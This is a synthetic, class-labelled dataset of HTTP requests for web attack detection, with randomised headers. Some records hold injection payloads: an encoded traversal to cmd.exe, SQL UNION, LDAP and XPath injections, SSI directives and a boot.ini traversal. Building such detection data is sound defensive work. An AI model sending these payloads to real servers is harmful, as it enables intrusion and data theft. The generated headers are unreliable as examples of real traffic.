UA-CPU: x86
UA-Disp: 950,9201,32
UA-OS: Linux
UA-Color: color8
UA-Pixels: 5729x0287
Via: rLr/2.0 www.oa1r.tiff, 3.2 90.214.82.181:3
Transfer-Encoding: identity
Upgrade: ombmMg/6.7
Warning: 890 www.nUiou.jpeg "oe52aLer" 
X-Forwarded-For: 241.107.33.0
X-Serial-Number: 6793102
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 16655
Start - Id: 44236
class: OsCommanding
GET ..%%35c../..%%35c../..%35c../..%35c../winnt/system32/cmd.exe? HTTP/1.1
Host: 11.182.254.113
Connection: tnai
Accept: */*
Accept-Charset: *
Accept-Encoding: gzip;q=0.6, deflate, deflate;q=0.7, compress
Accept-Language: *
Cache-Control: min-fresh=40
Client-ip: 157.29.164.15
Cookie: coit4elcsbneac=228;c0uwe2e=5596737
Cookie2: $Version="9"
Date: Fri, 27 May 05 20:39:06 GMT
ETag: W/"ZSz6CGXGK.XnFvDbA3Ds"
Expect: 100-continue
From: ided@udhoes.uk
If-Modified-Since: Wed, 01 Mar 06 01:04:52 CET
If-Unmodified-Since: Mon, 07 Mar 05 11:34:53 CET
If-Match: *
If-None-Match: "vmSzjvsbfVWl4hr"
If-Range: "KYZOOKQ2z4Kot3kdi"
Max-Forwards: 626
MIME-Version: 1.1
Pragma: no-cache
Proxy-Authorization: Basic aHRybng6ZWxMYQ==
Authorization: tOde nurp1=vlcwt
Range: 0-3876
Referer: http://6ethueao.net/baSCq/adoahejt/emnexee.php
TE: gzip;q=0.7
Trailer: Proxy-Authorization
User-Agent: Mozilla/6.7 (compatible; bElamg; Solaris; eeyh; shndiX3; aeoo)
UA-CPU: x86
UA-Disp: 220,5543,32
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 352x848
Via: ope/1.8 62.62.143.236:28778, meretn/5.3 www.sro8rN.shtml
Transfer-Encoding: identity
Upgrade: eylet/4.8, moe/0.2, jtiu/7.5, ratas/1.7, ott/5.5
Warning: 992 www.i1e3itee.jpg "capc8tz" 
X-Forwarded-For: 242.235.213.130
X-Serial-Number: 33909969
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 44236
Start - Id: 4076
class: Valid
PUT /i9HXk1kWm7/ciuminhe4tia70enTu0/mOfsQ_03Quc/rusrex0U/14RpuQ6O1/trpftdtbccgdpLSgtet/oBhg/s0b5s4timtmA6/sh/exur8XSgc8AA.php? HTTP/1.0
Content-Length: 227
Content-Language: hrdef
Content-Encoding: compress
Content-Location: http://Nbgntlo.be/ePaszct/3drl/egti/sEtsds/dulsqX.exe
Content-MD5: cmV0b2F1bWh1VEl0aW51ZQ==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 11 Jan 10 10:06:31 GMT
Last-Modified: Tue, 19 Oct 04 14:22:30 UTC
Host: 201.178.127.107
Connection: Ae8r
Accept: */*;q=0.9
Accept-Charset: utf-8, iso-8859-6, euc-jp, cp-950;q=0.8
Accept-Encoding: gzip, gzip, compress, identity;q=0.9
Accept-Language: i-4e, m5ot-4lqpmV;q=0.7, 8qOa-dSBet, aio-innMitq, eeoieo-omtqsrv
Cache-Control: max-age=0
Client-ip: 35.195.148.208
Cookie: wiwotqXqsehnd=cghotale'd;sybcdImelo2s=eanhxq4lnNion\n
Cookie2: $Version="12"
Date: Fri, 30 Jun 06 22:22:55 UTC
ETag: W/"34.Fp9it3IklN58"
Expect: 100-continue
From: hrvsuatt@aoxhot.fr
If-Modified-Since: Fri, 26 May 06 22:29:38 CET
If-Unmodified-Since: Fri, 28 Oct 05 24:42:51 CET
If-Match: *
If-None-Match: "GbK39dr20ZwZO-9LzB"
If-Range: Wed, 03 Dec 08 24:10:52 GMT
Max-Forwards: 861
MIME-Version: 1.7
Pragma: no-cache
Proxy-Authorization: Digest realm
Authorization: RagaEn iEjE=atamett
Range: 68415-202,-237,-9
Referer: /hun5w/Mrkab.jpeg
TE: trailers,trailers,gzip
Trailer: If-Range
User-Agent: 6t9seml/5.3.7
UA-CPU: 68000
UA-Disp: 4996,3715,16
UA-OS: Win98
UA-Color: color32
UA-Pixels: 785x5057
Via: 9nAay/5.8 242.127.244.255:5788, 6.8 212.79.146.35:12250, 8.4 www.aocyio.jpeg
Transfer-Encoding: gzip
Upgrade: Shirma/5.1, ed1/0.7
Warning: 299 156.13.23.207 "9sa7wT" 
X-Forwarded-For: 68.146.106.65
X-Serial-Number: 8957401
----: ---------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

a6remrIetM=eoalngs&cnarqoo=23056&VN8nn@6insertSKnP=eJMfm4a&emMaOsiR=m@Npassthruw5 Htau|fra>&X_SPOF1Oe5m=ls abmietdntctst>d 0&Z8passthrucg_F= eAloykrq rmmi[&Eiisicecat9I=wmtnwn&eOfnsnfen=pozv&CJWCrB=oeceeis&84gZ6wysf=3

End - Id: 4076
Start - Id: 28101
class: Valid
GET /bgsoundJwt.sh? HTTP/1.1
Host: 2.249.74.90:80
Connection: keep-alive
Accept: text/*;q=0.3, video/*
Accept-Charset: *;q=0.5
Accept-Encoding: *;q=0.1
Accept-Language: *;q=0.4
Cache-Control: no-store
Client-ip: 203.118.153.113
Cookie: xtermh9mb7qxWU@=jiuIl]tn|
Cookie2: $Version="6"
Date: Wed, 22 Jul 09 15:36:09 GMT
ETag: W/"XUfnP3E3zKGKY_kZ_"
Expect: 100-continue
From: pnlav3j@ifnra.biz
If-Modified-Since: Wed, 03 Mar 10 15:43:18 CET
If-Unmodified-Since: Thu, 03 Apr 08 04:01:58 GMT
If-Match: "dNxnuhwx1NfcaI3"
If-None-Match: "Kr627cDzu1HPnSJPF.o"
If-Range: "T529kDAYygjAvRvMb9"
Max-Forwards: 46
MIME-Version: 2.1
Pragma: ccateiW0=7gsE6e
Proxy-Authorization: NTLM c2huT3NveW4xN2lnNm5yeW9qbDR0ZmV1QUhvcmxhZXR0b21hZA==
Authorization: NTLM cDd1cmlzb2VvTnNwdGl0dGU1SHNjbnZhd2VzbnNvc3p0ZWtndDlsbXR4Y2Jo
Range: 432781-
Referer: http://www.to8utR.com/tdaee/9Trhit/ire7/neTh.cgi
TE: deflate,chunked;q=0.6
Trailer: Accept-Charset
User-Agent: firsrH1Rgetbnf
UA-CPU: MIPS
UA-Disp: 166,4722,8
UA-OS: Win95
UA-Color: color32
UA-Pixels: 4261x691
Via: HTTP/1.0 54.253.58.23, 8.7 186.82.248.119
Transfer-Encoding: gzip
Upgrade: bdNih/1.1, xdHnh/3.6, htee/4.4, 6mIer/6.0
Warning: 810 www.cq0i.htm "twdSte9atJriluetrna" 
X-Forwarded-For: 184.51.223.21
X-Serial-Number: 00220093101680020421
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 28101
Start - Id: 42315
class: SqlInjection
GET /ncboameXnrnfs/bno/oeHLNB45o51r8f/OheuytaidIouC/gG1opt-/en7ebrd/ost/thhorl6lvrseafphnae.html?eoe0ypt7oBti=%27%29+++UNION+ALL+++SELECT+++++jdlsest+++FROM+++++rerse+++WHERE+++++%28+++%27%27++++%3D++%27 HTTP/1.0
Host: 4.83.219.212
Connection: enaihqV
Accept: application/x-tar, audio/*, application/zip
Accept-Charset: *
Accept-Encoding: 
Accept-Language: rzq-E5nloh, svii-p9e
Cache-Control: no-store
Client-ip: 154.133.66.12
Cookie: is2qnrniENrlSl=egrneseattd6rrmayl;QdK@=tntphbk;euIn2MseohiTse=rr7n;LOperl-=l38ZPBwvoc;salmD8ce1tbado=e ws@efyet@Odpasswd
Cookie2: $Version="954"
Date: Tue, 09 Sep 08 09:19:04 CET
ETag: "3b.fk.WCMYAXJiT2"
Expect: sEeh=gef1
From: h5dt@dgwd.cz
If-Modified-Since: Mon, 25 Apr 05 05:37:00 UTC
If-Unmodified-Since: Thu, 20 Jul 06 18:19:51 CET
If-Match: *
If-None-Match: "lUwiy4XMBqqwuBzE-9O"
If-Range: Fri, 26 May 06 01:59:13 GMT
Max-Forwards: 6
MIME-Version: 7.7
Pragma: o=t4eeiyl
Proxy-Authorization: aslasl sfwmhi=G8in4aid
Authorization: lllo ni4wt=cetnna
Range: 02230-
Referer: http://www.0h3d.org/lewltedn/ozot.sh
TE: deflate
Trailer: Authorization
User-Agent: oca9rieUataMedoeit8
UA-CPU: x86
UA-Disp: 695,8049,32
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 4371x6437
Via: 9.6 3.180.108.165, 8.6 49.165.238.84, mNOi/4.7 www.euqirl.gif
Transfer-Encoding: deflate
Upgrade: i7iya/1.9, iT3ylo/7.2
Warning: 797 57.31.42.175 "ddh8os78iba" "Mon, 22 Aug 05 11:07:24 UTC"
X-Forwarded-For: 235.94.27.226
X-Serial-Number: 807714416153290560
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42315
Start - Id: 2524
class: Valid
GET /.g.html?9d9O=0498705&0n=3AL2be&neoEszetnk=abp1eaIsto%25eS&zn00QBq3=scanpasswdinsert&fahttdsmotndEa=h-HYS%40_-Hb&-IpTiB8lkV=911&RAYinsert=nsDFm&3sntsbglPHinus=9939&yng6tmt4abmjrr=rsiboot.ini3&Qthtblrjre=ee7io&nartreyEsqbzmI=572565&rn2maMhaon5p=pttesDjajras&Rasfdn=94076&yottstoTmihed=z26B9qkSZpg HTTP/1.0
Host: www.citdaz4sd.st
Connection: gzpieiAn
Accept: */*;q=0.2
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-store
Client-ip: 171.191.7.222
Cookie: EZ@FXstdinpassthru@C=X2e;Agsock_streamIwindow.openVdW2var=mee$feaRlobjectnreq;WfTj=mug;ardbNtt=7093
Cookie2: $Version="794"
Date: Fri, 10 Nov 06 14:34:11 UTC
ETag: "CelH7v9rhJypvTbLpia"
Expect: 100-continue
From: lifcswz@aveP.cz
If-Modified-Since: Mon, 17 May 04 08:55:12 UTC
If-Unmodified-Since: Fri, 06 Apr 07 13:39:29 UTC
If-Match: *
If-None-Match: *
If-Range: Tue, 25 Jan 05 04:52:32 GMT
Max-Forwards: 41
MIME-Version: 7.0
Pragma: mee70l='apud6I2t'
Proxy-Authorization: Basic dGl2dEVleHI6Zm5tZ2g=
Authorization: nsrnl h85beeei=gkpla
Range: 32-6,-041504
Referer: http://siiwt.cz/efmnerod/6ej3t/or0t/yjnm.dll
TE: deflate,trailers,chunked
Trailer: Date
User-Agent: Mozilla/6.2 (Machintosh; U; PPC Mac OS X 6.3; ds-ad; rv:1.0.3) Gecko/08251053
UA-CPU: MIPS
UA-Disp: 284,569,32
UA-OS: Win95
UA-Color: color16
UA-Pixels: 6834x6538
Via: 0.9 99.201.26.105, FTP/5.9 32.63.218.66, 4Btoee/5.6 www.oliW.js
Transfer-Encoding: identity
Upgrade: ia4er/9.3, i4os/2.0, 2ctlrr/2.8, ssda5h/3.4, t6p/1.9
Warning: 328 www.o0iot.shtml "okhortmuaesoti" 
X-Forwarded-For: 8.183.220.41
X-Serial-Number: 347745233258688600
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 2524
Start - Id: 39380
class: SSI
GET /eV/steotn8htyxaU.js?6xb=n&fyn8wSOKFuEK=6506&enu=4&qftpFUbodydSQA4.k=t4ec%27lCnetcatsRt%24dnt-Iltlike&ist=616&hwl7lttbheeio=%3C%21--%23echo+var%3D%22date_gmt%22--%3E&cEztdsc=bpmateRltekw6e&Euysyk4ire=t96d4l&Fe7epFeT=nYcTG33kQwF&dxapoyt=1&zs=e&lr=992055&2alftniqiegirt=A%28&1rscriptL0L8Js=+nnori%28sgucs HTTP/1.0
Host: www.ayeaseGild.st:80
Connection: ee4ctlt
Accept: application/*;q=0.9, image/*
Accept-Charset: *
Accept-Encoding: compress;q=0.8, gzip;q=0.5, deflate;q=0.7, identity;q=0.6, deflate;q=0.0
Accept-Language: nuee-Asteth;q=0.4, h-6, usarsdcb-mtEah, n-huiocE, T-l40et
Cache-Control: no-store
Client-ip: 196.184.80.212
Cookie: horbrhiz2g91=8ntn7ieealsniVAf;swbt6nz=bgbfiseterev:;34awofeR=ll;reost=8@lHTV-xTp8p;g9rNsjnetqW7u=as;RsystemmqWj6=s)
Cookie2: $Version="6"
Date: Mon, 21 Nov 05 03:09:32 UTC
ETag: "NH0nqaIAQJf.Juk35"
Expect: 100-continue
From: lrS1n@ltwen24wwu.net
If-Modified-Since: Thu, 22 May 08 11:52:37 GMT
If-Unmodified-Since: Sun, 28 Sep 08 24:21:42 CET
If-Match: *
If-None-Match: *
If-Range: Mon, 30 Aug 04 08:28:18 GMT
Max-Forwards: 29
MIME-Version: 0.0
Pragma: estre=tolryoa
Proxy-Authorization: NTLM N3RGc3RpbGRnanRleWRzUGthc3MwcmVldGlESmo4ck4=
Authorization: Basic ZW90c1M6Y3BpZXI=
Range: -7403,569103-
Referer: http://riptege6.de/9yAi.exe
TE: gzip;q=0.6,trailers
Trailer: If-Modified-Since
User-Agent: sioQNtrmuTihl
UA-CPU: x86
UA-Disp: 939,8855,16
UA-OS: Win95
UA-Color: color32
UA-Pixels: 757x2155
Via: HTTP/4.2 100.28.171.184, FTP/9.2 www.ruhntn5e.jpg, HTTP/1.6 6.19.55.50
Transfer-Encoding: baag
Upgrade: Trtet/1.3, sieet/3.4, eced/6.6, yns/9.1, snfH/3.3
Warning: 718 12.78.142.38 "hTEovTag" 
X-Forwarded-For: 98.145.13.52
X-Serial-Number: 3967259354
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 39380
Start - Id: 36021
class: PathTransversal
GET /t@G_FCaE5/ORep0eEXpocnltti/ear/tsnfopt6flteley.shtml?Eutetnrsd=g75connect++wu%5Be&dsiTajes5rlee0=335&KM_n2updateay58M=9yinputg&rfI=Maccopy&2ol=iniaccept&ict=peesE&rtt6awrk0or=edivPiritentbv%26&WlinkIIhtpassDQ=n+&t5ieut3onefnfsi=home%7ETNsKt8at&e7Meevxt=2883541&xtrtobouoienEon=d%3A%5Cwindows%5Cboot.ini&tUzNIE7FmaA=npmrc9oretceo HTTP/1.0
Host: 246.27.100.244:80
Connection: keep-alive
Accept: */*;q=0.2
Accept-Charset: *
Accept-Encoding: 
Accept-Language: rcehzgoh-wunt1, 9Nnw-h6e8cc;q=0.5, ah8totq-et, sOs7js-s24Tesi9, bsnututg-Y;q=0.2
Cache-Control: no-store
Client-ip: 236.32.209.129
Cookie: Ed2ses=142;t8Ovtt1enenaat=wtSohd;ls9daovesatcMAe=en i;dneesiei067=tQbm
Cookie2: $Version="1"
Date: Wed, 12 Mar 08 22:48:36 GMT
ETag: "1a58EMborIstQSXjUbu@"
Expect: ynaht
From: e1ea@teeopdrn.uk
If-Modified-Since: Thu, 01 Sep 05 06:17:47 CET
If-Unmodified-Since: Wed, 03 Aug 05 16:08:54 GMT
If-Match: *
If-None-Match: "8Xe4YpSVMFzaxu7"
If-Range: Thu, 15 Jun 06 06:48:47 UTC
Max-Forwards: 289
MIME-Version: 9.9
Pragma: no-cache
Proxy-Authorization: NTLM bmFiRXRsbmlnZXplYWxzTml1bWVlYWVyYWFzdHNkZDh4YTE0bmo=
Authorization: Digest opaque="ek3w"
Range: -05066,-92,-024075
Referer: http://etRhJ.biz/or6ain/oIf3sg/adir/euxeoe.exe
TE: chunked;q=0.5
Trailer: Host
User-Agent: tatiofit/0.1.7.6
UA-Disp: 097,2396,8
UA-Color: color8
Via: 1.5 0.35.153.4:117, dnR/5.7 248.98.233.112, FTP/7.8 85.169.36.74
Transfer-Encoding: deflate
Warning: 366 209.231.92.237 "1njhsgaZmEo" "Fri, 29 Feb 08 20:21:14 CET"
X-Serial-Number: 83480
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36021
Start - Id: 37186
class: LdapInjection
GET /emPeiOdqWnSUf/othg2ntqihd/miv/vvg_UwGpnUi9r_oN2WhU/0vPLAmiupt1Q/eL9_0v.kiA/h69ITRE5d0DxwbzLxwe/i6Og1ukwXA8HHK0.6v9/rtsruh.html?eOeld=%29+++%28++%7C%28displayName%3Dhad*%29+%28name+%3D++++had*++%29%28++mail%3Dhad*+++%29&hoyuohdNra1i=nnren6xdiv7podicl1n%5D&lea2ufesti5Rbse=td+ysegegsystemA&cnrw6dolf=te+z+dbcw1&NmEsob=0docmdatrhtacces HTTP/1.0
Host: www.d0sj5.com
Connection: close
Accept: */*;q=0.3
Accept-Charset: *
Accept-Encoding: compress, identity
Accept-Language: oNodn7eT-5hinht;q=0.0, nsn-wmaoaimo;q=0.6, Tea-hitea1, a-t6l;q=0.6, kcliAoar-wIRniba3
Cache-Control: no-cache
Client-ip: 70.71.99.38
Cookie: aswREeeGflOe=4etcri u :D$u:ter ercp;ot5zomusl=8etr;eeurroex=K8=;depddor9ccoCnaa= Hnl
Cookie2: $Version="2"
Date: Thu, 26 Feb 09 09:25:23 UTC
Expect: sgdaie
If-Modified-Since: Sat, 03 May 08 21:39:35 UTC
If-Unmodified-Since: Mon, 11 Aug 08 09:44:33 GMT
If-Match: *
If-None-Match: "ts9IO4T94KkfxVGe2xNl"
If-Range: Wed, 14 Sep 05 03:31:26 UTC
Max-Forwards: 503
MIME-Version: 6.5
Authorization: iai0nd 4nyszpea=dnbr
Range: 3385-,6968-,40-033
Referer: /esShShr3/vgeirLa/arna/dveceO.jsp
TE: chunked;q=0.3
User-Agent: Mozilla/0.9 (Machintosh; U; PPC 9.8; we-li; rv:5.8.0) Gecko/40645553
Via: FTP/9.7 www.levx8zb.tiff:83
Transfer-Encoding: identity
Warning: 049 www.snrd.js "elEedMobfonU" 
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37186
Start - Id: 11202
class: Valid
GET /ouqhnn2t/s-93GiW/etteien94thks.bin? HTTP/1.0
Host: www.z5sosAor.org
Connection: keep-alive
Accept: image/*;q=0.9
Accept-Charset: x-mac-cyrillic;q=0.7, x-mac-greek, iso-8859-9;q=0.6
Accept-Encoding: 
Accept-Language: raNmta-eesiaeyx;q=0.2, at6U-whhgdr
Cache-Control: 5e=RFuc9un
Client-ip: 210.30.250.18
Cookie: jaEaaht=4;un3=n2mRqp
Cookie2: $Version="256"
Date: Mon, 28 Apr 08 14:15:29 CET
ETag: "zXSC2Mz4_ZtVSzXpi"
Expect: e8howtr
From: oner40@a3mRaitss.com
If-Modified-Since: Sat, 03 Apr 04 21:22:46 GMT
If-Unmodified-Since: Wed, 12 Mar 08 24:18:09 CET
If-Match: "iJpf3PWf3c-xqFfJes4"
If-None-Match: *
If-Range: *
Max-Forwards: 8478
MIME-Version: 3.9
Pragma: dtreed='py57upi'
Proxy-Authorization: Digest cnonce="irua"
Authorization: Digest uri=/scFotvsr/uvt9D6/lqirvUo/sa5utas.mpeg
Range: -62895,1183-7810
Referer: http://www.ynt4ien.st/f5pymne/nioes6lE/nccrt.exe
TE: deflate;q=0.3
Trailer: Range
User-Agent: lgMrw@Zs99 http://www.aood3t.com
UA-CPU: StrongARM
UA-Disp: 473,1490,32
UA-OS: Linux
UA-Color: color32
UA-Pixels: 1597x0250
Via: 8.4 www.iae3iirc.html, ok7pti/1.6 www.senz0iie.html
Transfer-Encoding: h70enh; uost9a=n58yl
Upgrade: soi/9.2, sgsr8/4.6
Warning: 482 www.nt5e.js "raopnnI2epacwex" "Sun, 04 Jan 04 12:41:28 CET"
X-Forwarded-For: 137.203.184.31
X-Serial-Number: 450563801661696804
----: ---------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 11202
Start - Id: 20269
class: Valid
GET /netd4epfszrs/uj5XAATAT5r5.BFEYq-f/nb.asmx?bRrmvX5RI7=1cateefeSjalei HTTP/1.1
Host: www.aetdbmn.gov
Connection: close
Accept: */*;q=0.2
Accept-Charset: iso-8859-15
Accept-Encoding: *
Accept-Language: Hddcoh7-hlf, mh-cN9;q=0.4, aHoqfnh-r4aia1, ua2pr8l6-m3nOr;q=0.1, ae4u-eeg6gn;q=0.2
Cache-Control: no-store
Client-ip: 66.96.116.160
Cookie: oqse=Flqtittegah1ertv
Cookie2: $Version="7"
Date: Mon, 06 Jul 09 18:16:45 GMT
ETag: "GRSd.RAB2xqYJdR"
Expect: eata
From: ptdetu@lTemn.cz
If-Modified-Since: Sun, 06 Jul 08 10:32:56 GMT
If-Unmodified-Since: Sun, 17 Jul 05 15:08:20 CET
If-Match: *
If-None-Match: "favZNyTBDDwc@mabb"
If-Range: Thu, 02 Aug 07 03:18:29 UTC
Max-Forwards: 2
MIME-Version: 1.5
Pragma: no-cache
Proxy-Authorization: NTLM Y25lYWFlZXJybjZHZXNkYXRzY21ld2VvZG5zOHVhaGRseGVmZWVodGd3c29lbA==
Authorization: Digest nc=7Caf5DaF
Range: 2-254176
Referer: http://www.tZeqaa8I.ch/7xrcy.swf
TE: trailers,trailers
Trailer: Accept-Language
User-Agent: Mozilla/8.2 (X11; U; Linux i386 6.4; hi-ai; rv:4.2.2) Gecko/88132893
UA-CPU: MIPS
UA-Disp: 161,462,8
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 0564x652
Via: N1rri/2.2 www.nke7e.jpg, HTTP/7.2 www.otP4.tiff:0843, sNc/0.1 www.aq5nle.gif
Transfer-Encoding: identity
Upgrade: eCc/4.2, tne/4.8, kdeqH/8.0
Warning: 058 www.eyes9l.tiff "iseRqeh6t" 
X-Forwarded-For: 33.165.104.226
X-Serial-Number: 11361465282
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 20269
Start - Id: 3650
class: Valid
GET /3aedcisicwsa/7echooptb/8WBu/pVoFc-JvmUL/3gOeemcen/umax-7XYgadR7UMPR/-JjIuAJH7K2/swj96EEQXQga/qMA.exe? HTTP/1.0
Host: 10.35.87.201
Connection: keep-alive
Accept: */*;q=0.8
Accept-Charset: koi8-r;q=0.7, iso-8859-8, windows-1252
Accept-Encoding: *;q=0.4
Accept-Language: iOin1Bv-eiot, oese-vx6jt, hr-e;q=0.1, BlytHi-o;q=0.6, R-r1a;q=0.8
Cache-Control: no-cache
Client-ip: 79.185.159.211
Cookie: atl5oneheESo=enfs;hqvqudxBiduhaAl=servicese'eia 7wgettt2
Cookie2: $Version="8"
Date: Thu, 13 Aug 09 21:28:25 UTC
ETag: W/"5okAPPHtvX0fM_1QIu"
Expect: 100-continue
From: tRacmea@eiis.cz
If-Modified-Since: Sun, 14 Aug 05 04:56:09 CET
If-Unmodified-Since: Sat, 28 Oct 06 20:20:22 GMT
If-Match: "mL9HtJQzc-RcTvb"
If-None-Match: "XnlKnea.z2hsPR8"
If-Range: "UmIo.hchiAotHECg"
Max-Forwards: 0403
MIME-Version: 8.4
Pragma: 8itGrb9b=E3T9hsm
Proxy-Authorization: Digest opaque="nde1rea"
Authorization: NTLM czZheUhyYWhlYmFsVnNydHJlYkJ1VXdwbmVhOGVjZWU4dXVldXV2aTc=
Range: 266128-
Referer: /iefsopS/dmi5r8/Erwklnue/rrl4al.cfm
TE: chunked;q=0.5
Trailer: Authorization
User-Agent: Mozilla/2.4 (Machintosh; U; Mac OS X 1.2; 5o-ik; rv:7.4.7) Gecko/78094741
UA-CPU: StrongARM
UA-Disp: 409,337,32
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 1057x068
Via: 4.6 114.114.89.203, 2.0 www.ie6bl.html, 0.8 100.52.186.169
Transfer-Encoding: compress
Upgrade: w6fseo/2.2, aeoo/1.8, ranrg/9.1, it9/2.3
Warning: 615 www.rhpe.shtml "litiIofi1" 
X-Forwarded-For: 153.114.223.45
X-Serial-Number: 02989198199377
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 3650
Start - Id: 49707
class: XPathInjection
GET /aoi9/4IWMC/t8Nef09Va52YIGrYSuP/eHEdocumentz/PIGyE5/soeaz4ni.js?tisimmh6mad=keeoipdng&g5KQWh=kfitdafcm3les&do=3667&VuXPvv1OYVW%u=y&SB_gNB2=x+f&u8ahp=6%3A&eA5bVAinputyZE=Ed6tmemeemsraxsh&si9iRozgeeshn=c6nU&opc1luee=ojk1fiFRvU&hEmaegtip=83&9eqqAd4=onac%2FbOubh%2Fshqn3%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3D44%5D+++or+%27Sac9ms%27+%3D++%27 HTTP/1.1
Host: 151.55.53.150
Connection: s2eqhgEn
Accept: image/*;q=0.3, image/*;q=0.3, text/*;q=0.5
Accept-Charset: iso-8859-2, shift_jis, euc-kr;q=0.4, windows-1254;q=0.7, hz-gb-2312;q=0.2
Accept-Encoding: *;q=0.3
Accept-Language: *
Cache-Control: no-transform
Client-ip: 250.131.219.97
Cookie: e5eoeZla=atzReAoEmQXD
Cookie2: $Version="241"
Date: Fri, 02 May 08 21:13:57 UTC
ETag: W/"s3klw_r.kke6tQh"
Expect: aap7xdn=Hphoh
From: tmHtei@9Eaetn4.de
If-Modified-Since: Thu, 27 Aug 09 20:38:51 CET
If-Unmodified-Since: Sat, 28 May 05 15:34:13 CET
If-Match: *
If-None-Match: "M2o.KHXAyB@bXeNbgnSV"
If-Range: Wed, 14 Apr 10 24:42:24 UTC
Max-Forwards: 4
MIME-Version: 3.5
Pragma: 7='tAw'
Proxy-Authorization: NTLM ZG50ZWdyZGNnZ2hwYXJseXRtd2Zlc2JpYWVzeXJ3dmFuQmhwYTFhc29FZW8=
Authorization: Digest opaque="3udRemTa"
Range: -643856,2-,-073392
Referer: /tteesfu/kbeXhc/stz0gcf/hA2ter/trau.jpg
TE: trailers
Trailer: Expect
User-Agent: Mozilla/1.9 (Machintosh; U; PPC 0.0; DD-9o; rv:9.0.8) Gecko/83416210
UA-CPU: StrongARM
UA-Disp: 731,8185,8
UA-OS: Win9x
UA-Color: color16
UA-Pixels: 6094x1402
Via: hewuns/7.4 www.e3acmc.shtml
Transfer-Encoding: Mhni
Upgrade: efrt/7.4, hih/2.5, 5as/1.1
Warning: 018 www.iupl6.jpg "b3zD8yiorsn" 
X-Forwarded-For: 235.101.74.70
X-Serial-Number: 13247958
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 49707
Start - Id: 18686
class: Valid
GET /eGR/e1reejnhsjca0e/bpJ3uxi9nn6OL/Ble2zq8p/ep9d3/oyE.XHIGdf5TuWN0Iuh/c.rCgwGQXg34d1FXZp/DcL/t8XdKj2h_gC0pvOgKJ/ks2be1pu/L2tpcopy6t5nv-.js?xHZBXgy=cial HTTP/1.0
Host: 179.167.166.167:39346
Connection: keep-alive
Accept: application/*, video/quicktime, application/*
Accept-Charset: *;q=0.9
Accept-Encoding: identity;q=0.6, identity, deflate;q=0.4, identity
Accept-Language: acnMgsle-3s5drns;q=0.7, lbes-sihtr2a, e-Eat1i4u
Cache-Control: no-cache
Client-ip: 121.201.44.25
Cookie: troM1lndnn=6wrz;h7=teheAe)betweenw8hhuh;cIO=qez
Cookie2: $Version="935"
Date: Thu, 03 Jan 08 11:00:03 CET
ETag: "Qq1wpLUjZ4zji6rUl6O"
Expect: 100-continue
From: hloyosxc@tEpaaeg.de
If-Modified-Since: Sun, 27 Feb 05 03:23:27 CET
If-Unmodified-Since: Mon, 01 Aug 05 08:12:27 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 5
MIME-Version: 5.8
Pragma: no-cache
Proxy-Authorization: sSOb one05bhe=dmn8
Authorization: n2tnv i6Ath=9iaa
Range: 8793-,319-418665,-980
Referer: http://www.2a4t.com/tytupi/Chs6/ieasmtiO/hyRto/iI7ac.mdb
TE: trailers
Trailer: If-Match
User-Agent: Mozilla/1.2 (Windows; U; WinNT 0.1; Si-gt; rv:1.4.4) Gecko/65988590
UA-CPU: x86
UA-Disp: 8675,230,16
UA-OS: Linux
UA-Color: color16
UA-Pixels: 8595x9488
Via: 4.5 www.7bTr.jpg, FTP/9.0 23.79.201.178:69765, 2.6 96.91.231.66
Transfer-Encoding: deflate
Upgrade: Ctu57e/3.8, chee/8.1, lrvDmi/8.7, i9hei/6.7
Warning: 538 220.84.138.187 "risamfaWl6rs" "Tue, 09 Mar 04 19:12:07 UTC"
X-Forwarded-For: 241.151.124.130
X-Serial-Number: 343586
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 18686
Start - Id: 2767
class: Valid
GET /nJ/Lcita/sx9cB_Nboot.ini-window.openEm/4hjtroa0mln/L8QPen9u5L/T7updateF.n_H2.exe?W0ixist9sioee7=257&Mnih0em6rrRxIn=3111&se4E=0&thRq=tDhmEOej&no9rdloifhiinE=08329602&nasoe5sasss8edm=oxq6_tfoN HTTP/1.0
Host: 240.178.91.159
Connection: raHx
Accept: audio/*;q=0.4
Accept-Charset: hz-gb-2312
Accept-Encoding: *;q=0.6
Accept-Language: rl-yd9le;q=0.7, hhTeol-dDWia;q=0.1
Cache-Control: min-fresh=6509
Client-ip: 244.22.33.32
Cookie: cmeH=g;nTtSlons=cILU@;VC5scriptAi=txi
Cookie2: $Version="55"
Date: Wed, 15 Mar 06 04:14:37 CET
ETag: "0_4Ow6kduQ8_8BQzx"
Expect: ud20arnu
From: lqlhi@vaenn.fr
If-Modified-Since: Fri, 02 Jun 06 08:35:53 CET
If-Unmodified-Since: Sat, 24 Nov 07 16:01:09 GMT
If-Match: *
